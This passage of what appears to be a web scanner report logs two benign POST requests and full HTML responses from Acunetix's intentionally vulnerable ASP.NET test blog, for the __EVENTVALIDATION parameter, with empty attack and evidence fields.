29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8410&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDA8Z2d8toIZGRkSueUav%2F5rnqwPH5lW4n2t3hYwDM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK58azxBQL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUzrA3cb9xZKioSCq9kMQOKTG1ESQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:24:49 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDA8Z2d8toIZGRkSueUav/5rnqwPH5lW4n2t3hYwDM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK58azxBQL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUzrA3cb9xZKioSCq9kMQOKTG1ESQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:White" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1101 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,101 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8397&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAAk3Zm6NoIZGRklSpHqIK75o%2BbSXvbHx5gk99pg4k%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK59LzvBwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gV57GtpUrle2BI%2BCZ%2BYPGftoE0v2A%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:49:59 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAAk3Zm6NoIZGRklSpHqIK75o+bSXvbHx5gk99pg4k=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK59LzvBwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gV57GtpUrle2BI+CZ+YPGftoE0v2A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:White" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" 